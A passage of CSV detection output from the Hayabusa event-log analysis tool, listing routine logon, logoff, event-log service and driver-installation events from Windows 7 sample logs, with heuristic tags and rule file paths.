LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:35:09.745 +00:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x131c3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:35:57.635 +00:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:41:21.932 +00:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x13216,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:42:44.000 +00:00,IE9Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 17:43:31.734 +00:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:43:34.000 +00:00,IE9Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 17:43:56.893 +00:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:44:39.689 +00:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x36aed | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:44:39.689 +00:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x36b1d | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:44:39.689 +00:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:44:39.689 +00:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x36aed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 17:59:00.431 +00:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 18:15:07.962 +00:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x36b1d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 18:16:14.000 +00:00,IE9Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 18:17:04.250 +00:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 18:17:05.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 18:17:13.369 +00:00,IE10Win7,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 18:17:19.150 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x11c02 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 18:17:19.150 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x11c32 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 18:17:19.150 +00:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 18:17:19.150 +00:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x11c02,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 18:30:25.009 +00:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x11c32,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 18:30:40.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:21:46.785 +00:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:21:47.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:21:50.498 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x170f5 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:21:50.498 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x17125 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:21:50.498 +00:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:21:50.498 +00:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x170f5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:23:13.147 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: TP AutoConnect Service | Path: ""C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:23:13.240 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: TP VC Gateway Service | Path: ""C:\Program Files\VMware\VMware Tools\TPVCGateway.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:23:19.075 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware VMCI Bus Driver | Path: system32\DRIVERS\vmci.sys | Account: | Start Type: boot start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:23:30.884 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Memory Module Driver | Path: system32\DRIVERS\pnpmem.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:23:31.757 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: vSockets Driver | Path: C:\Windows\system32\drivers\vsock.sys | Account: | Start Type: boot start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:23:33.349 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Host Guest Client Redirector | Path: system32\drivers\vmhgfs.sys | Account: | Start Type: system start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:11.865 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft 1.1 UAA Function Driver for High Definition Audio Service | Path: system32\drivers\HdAudio.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:17.909 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Clock Proxy | Path: system32\drivers\MSPCLOCK.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:18.237 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Quality Manager Proxy | Path: system32\drivers\MSPQM.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:19.969 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Service Proxy | Path: system32\drivers\MSKSSRV.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:20.281 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Tee/Sink-to-Sink Converter | Path: system32\drivers\MSTEE.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:20.452 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware USB Pointing Device | Path: system32\DRIVERS\vmusbmouse.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:23.245 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Trusted Audio Drivers | Path: system32\drivers\drmkaud.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:30.249 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Radio USB Driver | Path: System32\Drivers\BTHUSB.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:31.310 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Port Driver | Path: System32\Drivers\BTHport.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:33.925 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Request Block Driver | Path: system32\DRIVERS\BthEnum.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:34.362 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Device (RFCOMM Protocol TDI) | Path: system32\DRIVERS\rfcomm.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:36.015 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Device (Personal Area Network) | Path: system32\DRIVERS\bthpan.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:38.153 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Pointing Device | Path: system32\DRIVERS\vmmouse.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:38.823 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Memory Control Driver | Path: C:\Program Files\Common Files\VMware\Drivers\memctl\vmmemctl.sys | Account: | Start Type: auto start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:39.011 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Vista Physical Disk Helper | Path: C:\Program Files\VMware\VMware Tools\vmrawdsk.sys | Account: | Start Type: system start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:41.647 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: vm3dmp | Path: system32\DRIVERS\vm3dmp.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:44.783 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: VMware Tools | Path: ""C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"" | Account: LocalSystem | Start Type: auto start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:24:53.788 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Snapshot Provider | Path: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Account: NT AUTHORITY\LocalService | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:25:04.605 +00:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x17125,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:25:05.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:25:51.420 +00:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:25:53.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 23:25:55.414 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1ac86 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:25:55.414 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b245 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:25:55.414 +00:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:25:55.414 +00:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1ac86,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:26:40.560 +00:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1b245,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 23:26:42.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-28 15:46:09.645 +00:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-28 15:46:10.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-28 15:46:12.437 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1a23a | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-28 15:46:12.437 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1a265 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-28 15:46:12.437 +00:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-28 15:46:12.437 +00:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1a23a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-28 15:48:19.456 +00:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1a265,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-28 15:48:20.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 14:46:21.750 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1e056 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:46:21.750 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1e3c9 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:46:21.750 +00:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:46:21.750 +00:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:46:33.911 +00:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:46:34.426 +00:00,IE10Win7,4634,info,,Logoff,User: IEUser | LID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:46:34.426 +00:00,IE10Win7,4634,info,,Logoff,User: IEUser | LID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:47:04.676 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x6831f | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:47:04.676 +00:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:47:04.676 +00:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x6831f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:47:04.676 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x6832b | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:47:20.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 14:47:20.053 +00:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x6832b,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:47:36.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 14:47:36.671 +00:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:47:38.430 +00:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:47:38.430 +00:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1dc1e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:47:38.430 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1dc1e | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:47:38.430 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1ee41 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:48:31.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 14:48:31.289 +00:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x1ee41,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:49:38.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 14:49:38.281 +00:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:49:40.000 +00:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:49:40.000 +00:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x1b293,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:49:40.000 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b293 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:49:40.000 +00:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x1b2fd | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-18 14:49:42.406 +00:00,IE10Win7,7045,info,Persis,Service Installed,Name: Intel(R) PRO/1000 NDIS 6 Adapter Driver | Path: system32\DRIVERS\E1G60I32.sys | Account: | Start Type: demand start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-18 15:28:28.043 +00:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 